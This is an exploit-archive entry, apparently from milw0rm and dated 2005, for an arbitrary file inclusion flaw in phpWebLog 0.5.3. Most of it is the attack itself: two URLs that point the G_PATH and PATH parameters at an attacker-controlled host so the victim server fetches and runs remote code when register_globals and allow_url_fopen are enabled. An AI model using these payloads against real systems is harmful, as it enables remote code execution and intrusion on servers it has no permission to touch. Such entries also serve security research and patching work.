phpWebLog 0.5.3 - Arbitrary File Inclusion
Author:
Filip Groszynski
Type:
webapps
Platform:
PHP
Published:
2005-03-07
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/
# milw0rm.com [2005-03-07]